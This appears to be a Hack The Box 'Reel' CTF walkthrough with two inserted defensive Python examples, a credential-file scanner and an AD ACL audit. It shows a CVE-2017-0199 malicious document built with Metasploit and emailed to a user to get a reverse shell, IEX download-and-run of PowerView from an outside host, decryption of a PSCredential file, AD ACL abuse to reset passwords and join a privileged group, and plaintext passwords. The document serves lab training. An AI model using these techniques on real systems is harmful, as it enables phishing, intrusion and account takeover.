htb-reel-nl

Today we are going to solve another CTF challenge, “Reel”, which is available online for those who want to increase their skill in penetration testing. Reel is a retired vulnerable lab presented by Hack The Box.
Level: Intermediate
Task: find user.txt and root.txt on the victim’s machine.
Let’s begin with nmap port enumeration.

 

c:\Users\jacco>nmap -sC -sV 10.10.10.77
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:16 W. Europe Standard Time
Nmap scan report for 10.10.10.77
Host is up (0.028s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| |_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=2/26%Time=5C758296%P=i686-pc-windows-windows%r(
SF:NULL,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\
--snip--
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.32 seconds


That’s quite an interesting attack surface we have right here! There’s no web service listening on this box, so right away we see this isn’t going to be the typical webapp-exploit-then-root machine, which is cool!

Whenever I see FTP, the first thing I always try is anonymous login, so let’s go for that.

# ftp 10.10.10.77

Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
226 Transfer complete.

Perfect! Let’s see what documents we can download:

ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM                 2047 AppLocker.docx
05-28-18  01:01PM                  124 readme.txt
10-31-17  09:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.

After promptly getting the three files, we, as good kids, read the readme.txt first, because that is what we are supposed to do, right?

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

Hmmm. Converting RTFs to what? DOCX maybe? Since the other documents in the directory are Microsoft Word documents, that seems a reasonable guess. Now, I am unable to read Windows Event Forwarding.docx (my LibreOffice spits out an error every time I try), but I have more luck with AppLocker.docx. It says:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

Ok, bad news. This probably means we will have to face AppLocker once we get a shell on the box. But we are far from that! So, now what?

The wonders of metadata

We have a good amount of information from our enumeration phase. Now it is time to craft a meticulously planned several-stage attack or to bang our heads against the machine until something works. Yay, hacking!

We know from our nmap scan that the server has an SMTP service listening at port 25, which kind of sticks out now because of the readme.txt we previously read. So maybe we are capable of using this SMTP server to send e-mails, but to whom?

Well, whoever wrote or converted the documents on the FTP server is probably a user of the machine and therefore a potential victim. So is there a chance her user account is somewhere in the generated documents?

Now, I have a confession to make. I don’t usually add it to my writeups unless it gives some useful information, but I use exiftool on almost EVERYTHING I find during reconnaissance when solving CTFs or doing a pentest. It’s probably some kind of derangement that affected me after my first three or four CTF-like machines involved searching for metadata in images or documents.

So you can imagine I got really happy when I ran exiftool on the three documents and one of them was bingo:

# exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number         : 11.16
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 14 kB
File Modification Date/Time     : 2018:09:21 14:53:40+02:00
File Access Date/Time           : 2018:10:21 10:43:29+02:00
File Inode Change Date/Time     : 2018:09:30 21:12:19+02:00
File Permissions                : rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 2
Words                           : 299
Characters                      : 1709
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 14
Paragraphs                      : 4
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         :
Links Up To Date                : No
Characters With Spaces          : 2004
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 14.0000

Do you see that beautiful Creator field over there? We got an e-mail address, and probably a user of the box too!

Now I can actually make some kind of attack plan, as if this was some cool heist movie (I know this is cheesy but don’t ruin this for me, ok?):

  1. Craft a malicious RTF document (research on how to do this, because I’ve never done something similar!)
  2. Use the SMTP service running on the box to send it to nico@megabank.com, hoping he’ll open it in a vulnerable Word version in order to convert it
  3. Wait patiently for the shell

Yeah, seems easy right? (Narrator: it was not)

Malicious documents

The first thing we should do is to search for a suitable (and somewhat recent) exploit that could affect nico when he opens our RTF document. Our best friend searchsploit to the rescue!

A quick inspection of the exploit file with searchsploit -x 41934 reveals the CVE field (CVE-2017-0199) which, apart from looking more recent, is a great search term for Metasploit.

msf > search office_word_hta

Matching Modules
================

   Name                                        Disclosure Date  Rank       Check  Description
   ----                                        ---------------  ----       -----  -----------
   exploit/windows/fileformat/office_word_hta  2017-04-14       excellent  No     Microsoft Office Word Malicious Hta Execution


msf > use exploit/windows/fileformat/office_word_hta
msf exploit(windows/fileformat/office_word_hta) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/fileformat/office_word_hta) > set srvhost 10.10.14.20
srvhost => 10.10.14.20
msf exploit(windows/fileformat/office_word_hta) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf exploit(windows/fileformat/office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.doc          yes       The file name.
   SRVHOST   10.10.14.20      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   default.hta      yes       The URI to use for the HTA file


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word

Download the HTA from http://10.10.14.20:8080/default.hta and copy the generated document attachment so it can be sent:

root@kali:~/htb/reel/2019# wget http://10.10.14.20:8080/default.hta
--2019-02-26 15:33:23--  http://10.10.14.20:8080/default.hta
Connecting to 10.10.14.20:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6361 (6.2K) [application/hta]
Saving to: ‘default.hta’

default.hta                                 100%[===============================================================================================>]   6.21K  --.-KB/s    in 0s      

2019-02-26 15:33:24 (746 MB/s) - ‘default.hta’ saved [6361/6361]

root@kali:~/htb/reel/2019# cp /root/.msf4/local/msf.doc .
root@kali:~/htb/reel/2019# cp ~/Downloads/default.hta .
root@kali:~/htb/reel/2019# ls
default.hta  msf.doc

Send the mail:

root@kali:~/htb/reel/2019# ls
default.hta msf.doc
root@kali:~/htb/reel/2019# sendEmail -f puckie2@megabank.com -t nico@megabank.com -u RTF -m "2Please convert file" -a msf.doc -s 10.10.10.77
^CFeb 26 15:23:23 kali sendEmail[9312]: EXITING: Received SIGINT
root@kali:~/htb/reel/2019# sendEmail -f puckie3@megabank.com -t nico@megabank.com -u RTF -m "2Please convert file" -a msf.doc -s 10.10.10.77
Feb 26 15:23:51 kali sendEmail[9364]: Email was sent successfully!

Catch the shell:

msf exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.14.20:4444 
[+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://10.10.14.20:8080/default.hta
[*] Server started.
msf exploit(windows/fileformat/office_word_hta) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.77



msf exploit(windows/fileformat/office_word_hta) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x86/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.20:4444 -> 10.10.10.77:57400 (10.10.10.77)

msf exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

C:\Windows\system32>whoami
whoami
htb\nico

C:\Windows\system32>
An alternative for generating the RTF payload is the CVE-2017-0199 toolkit: python cve-2017-0199_toolkit.py -M gen -t RTF -w puckie.rtf -u http://10.10.14.20/puckie.ps1 -x 0

AppUnLocker

tom@REEL C:\Users\tom>sharphound.exe -c all
This program is blocked by group policy. For more information, contact your system administrator.

There are different techniques on the web to work around AppLocker; they are gathered in a GitHub repository, and many of them are described in more detail on the pentestlab blog.

It’s easier to get a basic reverse shell by calling a PowerShell script without the .ps1 extension.

Nico

We finally have a shell on this box. It’s going to be easy from here, right? Of course, that malicious document thing is the peak of difficulty of this machine, is it not? (Narrator: again, it was not)

Normally, my first serious move when landing on a Windows machine is running PowerUp.ps1, analyzing the results and working from there. But before that I like to peek around, at least in the home directory of the user I got access as. So, to C:\Users\nico\ we go!

In his Desktop, aside from the user.txt flag (yay!), there is an interesting file called cred.xml:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

Hey, I know the type PSCredential! As the name of the file suggests, it probably contains credentials, and judging by its contents they belong to the user tom. That’s great! It’s only a matter of researching what type of file this is and how to obtain the plain-text password from it. After googling a little, two StackOverflow answers help me understand that this file is the XML representation of a serialized PowerShell object, more specifically a PSCredential one, and that the PowerShell cmdlet Import-Clixml can help us undo the process:

nico@REEL C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
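Worked example, added here (not code from the writeup or from PowerShell): a Python scanner that recognises serialized PSCredential objects in CLIXML files like cred.xml, reports the user name, and checks that the stored SecureString starts with the DPAPI blob header. That header is why Import-Clixml only recovers the password when run as the account that exported it on the same host, and why a file like this left in a profile is worth hunting for. The sample files are constructed; the ciphertext is filler after the header.

```python
import xml.etree.ElementTree as ET

# Namespace of PowerShell's CLIXML serialization format.
PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
PSCREDENTIAL = "System.Management.Automation.PSCredential"
# Every DPAPI blob begins with version 1 followed by the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian byte order; this is
# the "01000000d08c9ddf0115d111..." prefix visible in cred.xml above.
DPAPI_BLOB_PREFIX = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def _q(tag: str) -> str:
    """Namespace-qualify a CLIXML element name for ElementTree."""
    return f"{{{PS_NS}}}{tag}"


def parse_clixml_credentials(xml_text: str) -> list:
    """Return one record per serialized PSCredential in a CLIXML document."""
    root = ET.fromstring(xml_text)
    records = []
    for obj in root.iter(_q("Obj")):
        type_names = [t.text for t in obj.findall(f"{_q('TN')}/{_q('T')}")]
        if PSCREDENTIAL not in type_names:
            continue
        props = obj.find(_q("Props"))
        if props is None:
            continue
        user = props.find(f"{_q('S')}[@N='UserName']")
        secret = props.find(f"{_q('SS')}[@N='Password']")
        blob = bytes.fromhex(secret.text.strip()) if secret is not None and secret.text else b""
        records.append({
            "username": user.text if user is not None else None,
            "blob_bytes": len(blob),
            # Export-Clixml protects a SecureString with DPAPI in user scope, so the
            # blob only decrypts for the account (and host) that exported it.
            "dpapi_protected": blob.startswith(DPAPI_BLOB_PREFIX),
        })
    return records


def scan_files(files: dict) -> list:
    """files maps a path to its text; returns a finding for every stored credential."""
    findings = []
    for path, text in files.items():
        if "<Objs" not in text or PSCREDENTIAL not in text:
            continue  # cheap pre-filter before parsing XML
        try:
            records = parse_clixml_credentials(text)
        except ET.ParseError:
            continue
        for rec in records:
            findings.append({"path": path, **rec})
    return findings


# Constructed sample in the shape of cred.xml: DPAPI header plus 16 filler bytes.
SAMPLE_BLOB_HEX = DPAPI_BLOB_PREFIX.hex() + "00" * 16
SAMPLE_CRED_XML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>{PSCREDENTIAL}</T>
      <T>System.Object</T>
    </TN>
    <ToString>{PSCREDENTIAL}</ToString>
    <Props>
      <S N="UserName">HTB\\Tom</S>
      <SS N="Password">{SAMPLE_BLOB_HEX}</SS>
    </Props>
  </Obj>
</Objs>"""

# A plain string export (Export-Clixml of "hello"), which the scanner must ignore.
SAMPLE_STRING_XML = f'<Objs Version="1.1.0.1" xmlns="{PS_NS}"><S>hello</S></Objs>'

if __name__ == "__main__":
    hits = scan_files({r"C:\Users\nico\Desktop\cred.xml": SAMPLE_CRED_XML,
                       r"C:\Users\nico\Desktop\other.xml": SAMPLE_STRING_XML})
    for hit in hits:
        print(hit)
```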
Go On Move

The most interesting thing once connected as Tom is a note left in an AD Audit folder:

tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).

Maybe we should re-run Cypher query against other groups we've created.

And in this folder is a copy of BloodHound waiting for us.

BloodHound is a tool that graphs the relationships between the different objects of an Active Directory (users, groups, machines, etc.) and thus highlights permission problems that make it possible to escalate to domain administrator privileges. An explanatory video can be seen on YouTube.

BloodHound has a graphical part (the interface) and an ingestor part, which generates the CSV files from which the graphs are built:

tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>powershell -nop -exec bypass

Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Import-Module .\SharpHound.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Invoke-Bloodhound
Initializing BloodHound at 5:15 PM on 2/26/2019
Starting Default enumeration for HTB.LOCAL
Status: 29 objects enumerated (+29 Infinity/s --- Using 69 MB RAM )
Finished enumeration for HTB.LOCAL in 00:00:00.3830422
0 hosts failed ping. 0 hosts timedout.

PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> dir


    Directory: C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        11/16/2017  11:50 PM     112225 acls.csv
-a---         2/26/2019   5:15 PM       4433 BloodHound.bin
-a---        10/24/2017   4:27 PM     246489 BloodHound_Old.ps1
-a---         2/26/2019   5:15 PM       4366 group_membership.csv
-a---         2/26/2019   5:15 PM        179 local_admins.csv
-a---        10/24/2017   4:27 PM     568832 SharpHound.exe
-a---        10/24/2017   4:27 PM     636959 SharpHound.ps1

The collector can be invoked more selectively, or a more exhaustive collection can be launched. In any case it generates CSV files in the current directory, which we quickly bring back to load into the BloodHound instance we installed and configured beforehand.

BloodHound has a path search feature that here does not return anything from Tom to the Domain Admins group. But if we look at the rights we currently have, it becomes interesting:

[Figure: BloodHound graph showing Tom’s WriteOwner right over the user Claire]

Here we have the WriteOwner right, which lets Tom set who the owner of the user Claire is.
It’s also possible to find this relationship directly with PowerView:

tom@REEL C:\Users\tom>powershell -version 2 -nop -exec bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\Bloodhound> Import-Module .\PowerView.ps1

PS C:\Users\tom\Desktop\AD Audit\Bloodhound> Get-DomainObjectACL -Identity Claire -ResolveGUIDs

AceQualifier : AccessAllowed
InheritanceFlags : None
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1130
IsCallback : False
AceType : AccessAllowedObject
AuditFlags : None
PropagationFlags : None
ObjectAceType : User-Account-Restrictions
OpaqueLength : 0
ActiveDirectoryRights : ReadProperty
AccessMask : 16
AceFlags : None
BinaryLength : 56
ObjectDN : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
InheritedObjectAceType : All
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-553
ObjectAceFlags : ObjectAceTypePresent
IsInherited : False

To exploit this we use the PowerView Set-DomainObjectOwner command. It is documented on the blog of wald0 (one of the authors).

PowerSploit has reference documentation for the command.

tom@REEL C:\Users>powershell -version 2 -nop -exec bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users>
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Import-Module .\PowerView.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All
PS C:\Users\tom\Desktop\AD Audit\BloodHound> net user claire !l33tpassw0rd /domain
The command completed successfully.

PS C:\Users\tom\Desktop\AD Audit\BloodHound> net user Claire
User name                    claire
Full Name                    Claire Danes
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/26/2019 5:24:38 PM
Password expires             Never
Password changeable          2/27/2019 5:24:38 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/29/2018 11:34:58 PM

Logon hours allowed          All

Local Group Memberships      *Hyper-V Administrator
Global Group memberships     *Domain Users         *MegaBank_Users
                             *DR_Site              *Restrictions
The command completed successfully.

Here we grant ourselves all rights on Claire. Note that obtaining only the ResetPassword permission does not seem to be enough to change the password.

Raise Your Hands

By gaining access to Claire I expected that we could then jump to the account claire_da, which is domain admin… but in fact no.
Claire has the WriteDacl permission on the group Backup_Admins:

[Figure: BloodHound graph showing Claire’s WriteDacl right on the Backup_Admins group]

and this group has, so to speak, nothing at all (there are only incoming relations).

[Figure: BloodHound relationship graph for the Backup_Admins group]

If we look a little at this type of group, we see that its members usually have unrestricted access to the file system:

A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut down.

We can then grant ourselves the privilege of adding members and add ourselves to the group:

PS C:\windows\temp> Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights WriteMembers
PS C:\windows\temp> net group Backup_Admins claire /add
The command completed successfully.
But disappointment: although we now have rights on the administrator’s profile folder:

claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
access to root.txt (the final flag) is nevertheless denied to us 🙁
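Worked example, added here (not code from the writeup, from BloodHound or from PowerView), covering both the WriteOwner-on-Claire finding and the WriteDacl-on-Backup_Admins finding above: a small Python audit over a constructed ACE export in the shape of Get-DomainObjectACL -ResolveGUIDs, reduced to the fields it needs. It flags control rights held by principals outside the expected admin set and walks the same owner/DACL/membership chain BloodHound’s path search would, so an AD owner can see the tom to claire to Backup_Admins chain in an ACL review. Object names and group memberships come from this page; the ACE list and the EXPECTED_HOLDERS set are assumptions.

```python
from collections import deque

# Rights whose holder can take over the object outright (names as in
# System.DirectoryServices.ActiveDirectoryRights, which PowerView prints).
CONTROL_RIGHTS = {"GenericAll", "WriteOwner", "WriteDacl"}
# Principals for which control rights are expected (assumed set); anything else is a finding.
EXPECTED_HOLDERS = {"HTB\\Domain Admins", "HTB\\Administrator",
                    "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}


def ace_grants_control(ace: dict) -> bool:
    """Does this ACE let its principal take over the target user or group?"""
    rights = set(ace["rights"])
    oat = ace.get("object_ace_type")  # resolved ObjectAceType; None means "all"
    if rights & CONTROL_RIGHTS:
        return True
    if ace["object_type"] == "user":
        # The reset-password extended right, or all extended rights.
        return "ExtendedRight" in rights and oat in (None, "User-Force-Change-Password")
    if ace["object_type"] == "group":
        # Writing the member attribute (or every attribute) means adding members.
        return "GenericWrite" in rights or ("WriteProperty" in rights and oat in (None, "Member"))
    return False


def describe(ace: dict) -> str:
    base = ",".join(ace["rights"])
    return f"{base}({ace['object_ace_type']})" if ace.get("object_ace_type") else base


def risky_aces(aces: list) -> list:
    """ACEs that hand control of a user or group to a principal outside EXPECTED_HOLDERS."""
    return [a for a in aces if a["principal"] not in EXPECTED_HOLDERS and ace_grants_control(a)]


def control_path(aces: list, memberships: dict, start: str, goal: str):
    """Shortest chain of (principal, right, object) hops from start to goal, or None.

    A hop uses an ACE held by the current principal or one of its groups.
    Controlling a user lets us act as that user; controlling a group lets us
    add a member to it and so act with the group's rights (BFS, like BloodHound's
    default shortest-path query but over control edges only)."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        actor, path = queue.popleft()
        if actor == goal:
            return path
        holders = {actor} | set(memberships.get(actor, ()))
        for ace in aces:
            target = ace["object"]
            if ace["principal"] in holders and target not in seen and ace_grants_control(ace):
                seen.add(target)
                queue.append((target, path + [(ace["principal"], describe(ace), target)]))
    return None


# Constructed ACE export; the ReadProperty entry mirrors the benign ACE PowerView showed above.
SAMPLE_ACES = [
    {"object": "HTB\\claire", "object_type": "user",
     "principal": "HTB\\Domain Admins", "rights": ["GenericAll"]},
    {"object": "HTB\\claire", "object_type": "user", "principal": "HTB\\tom",
     "rights": ["ReadProperty"], "object_ace_type": "User-Account-Restrictions"},
    {"object": "HTB\\claire", "object_type": "user",
     "principal": "HTB\\tom", "rights": ["WriteOwner"]},
    {"object": "HTB\\Backup_Admins", "object_type": "group",
     "principal": "HTB\\claire", "rights": ["WriteDacl"]},
    {"object": "HTB\\Backup_Admins", "object_type": "group",
     "principal": "HTB\\Domain Users", "rights": ["ReadProperty"]},
]
# Group memberships as listed by net user on the box.
SAMPLE_MEMBERSHIPS = {
    "HTB\\tom": {"HTB\\Domain Users"},
    "HTB\\claire": {"HTB\\Domain Users", "HTB\\MegaBank_Users", "HTB\\DR_Site", "HTB\\Restrictions"},
}

if __name__ == "__main__":
    for a in risky_aces(SAMPLE_ACES):
        print(f"FINDING: {a['principal']} holds {describe(a)} on {a['object']} ({a['object_type']})")
    print(control_path(SAMPLE_ACES, SAMPLE_MEMBERSHIPS, "HTB\\tom", "HTB\\Backup_Admins"))
```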

Several PowerShell scripts are present in a Backup Scripts subfolder, along with an archive BackupScript.zip.

I had the good idea of diffing the ps1 files present against those in the zip:

root@kali:~/Documents/reel/Backup Scripts$ diff BackupScript.ps1 yolo/BackupScript.ps1
1,2c1,41
< # admin password
< $password="Cr4ckMeIfYouC4n!"
--- snip ---

Claire

Ok, we are near! We only need to do something similar for the BACKUP_ADMINS group and see what being part of it means.

Of course, since we changed users, we need to load PowerView again:

> powershell
> IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.12.157/PowerView.ps1')

And again guided by the fantastic An Ace Up The Sleeve article, we can grant ourselves all ACL rights over BACKUP_ADMINS, since we have the WriteDacl permission:

> Add-DomainObjectACL -TargetIdentity 'Backup_Admins' -PrincipalIdentity claire -Rights All

With these rights, we should be able to add ourselves to the group:

> net group Backup_Admins /add claire

No errors, seems good! We can check it worked by running net user claire and seeing we are indeed a proud member of BACKUP_ADMINS. Great! Now what?

Note

At this point, while I was exploring Claire as a BACKUP_ADMINS member, other Hack The Box users were constantly resetting Claire’s password to other values, so if I logged out (you will see why in a moment) I couldn’t log back in. I ended up leaving Tom’s SSH session open and prepared a script to automate the process of resetting Claire’s password to the value I wanted so, if someone changed it, I could easily change it back. My ResetClairePassword.ps1 script was like this:

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
$SecPasswd = ConvertTo-SecureString -String 's0mepassw0rd' -AsPlainText -Force
Set-ADAccountPassword -Reset -NewPassword $SecPasswd -Identity claire 

Backup Admin

Another shameful confession. I wasted a lot of time at this point, and it was pretty frustrating. It had taken a lot of work to reach this point, and it seemed it was for nothing. I couldn’t access the Administrator home directory, I couldn’t read or write new files compared to base Claire, and BACKUP_ADMINS didn’t have any control over other AD objects according to BloodHound. So, was all this work for nothing?!

Turns out you have to log out and log in again for group changes to take effect. It’s something obvious, it’s something I knew from Linux (it works the same way there), but my tired brain couldn’t remember it, and that meant a lot of frustration and wasted time wandering around. Lesson learned (even though I thought I already knew this): if you are tired, take a break! Even if you feel the victory so near you could touch it, working with a tired mind almost never pays off.

Ok, after this dramatic complication we can continue! Log out, log in again, and the group change takes effect. Now, as Claire, we can access C:\Users\Administrator. Finally!! Let’s read root.txt and claim our well deserved prize:

claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.

God dammit!

It couldn’t be that easy, right? It seems there are other things in Administrator’s Desktop. Let’s see what this Backup Scripts folder is.

> cd "C:\Users\Administrator\Desktop\Backup Scripts"
> dir
  Volume in drive C has no label
  Volume Serial number is CC8A-33E1

  Directory of C:\Users\Administrator\Desktop\Backup Scripts

11/02/2017	09:47 PM	<DIR>		.
11/02/2017	09:47 PM	<DIR>		..
11/03/2017	11:22 PM		    845	backup.ps1
11/02/2017	09:37 PM		    462	backup1.ps1
11/03/2017	11:21 PM		  5,642	BackupScript.ps1
11/02/2017	09:43 PM		  2,791	BackupScript.zip
11/03/2017	11:22 PM		  1,855	folders-system-state.txt
11/03/2017	11:22 PM		    308	test2.ps1.txt
		    6 File(s)		  11,903 bytes
		    2 Dir(s)      15,719,768,064 bytes free

Alright, it’s just digging work at this point. After reviewing these scripts one by one (they seem to be used to automate the backup process of some directories of the box), we finally find what we are looking for:

> type BackupScript.ps1
# admin password                                                                                                
$password="Cr4ckMeIfYouC4n!" 
[...]

Is this it? Are we done?

PS C:\Users\jacco> ssh Administrator@10.10.10.77
Administrator@10.10.10.77's password: Cr4ckMeIfYouC4n!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

administrator@REEL C:\Users\Administrator>cd Desktop

administrator@REEL C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CC8A-33E1

 Directory of C:\Users\Administrator\Desktop

21/01/2018  14:56    <DIR>          .
21/01/2018  14:56    <DIR>          ..
02/11/2017  21:47    <DIR>          Backup Scripts
28/10/2017  11:56                32 root.txt
               1 File(s)             32 bytes
               3 Dir(s)  15,675,449,344 bytes free

administrator@REEL C:\Users\Administrator\Desktop>type root.txt
101*****32a

The dsacls way instead of PowerView.ps1

Tom takes over Claire: take ownership, grant GenericAll to Tom and allow him to reset Claire’s password (dsacls reference: https://ss64.com/nt/dsacls.html):
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /takeownership &&
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /G tom:GA &&
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /G "tom:CA;Reset Password"

Now change Claire’s password:

Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Log in as Claire and grant Tom membership of Backup_Admins:
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

Log in as Tom and verify the membership:
net user tom

Regards Puckie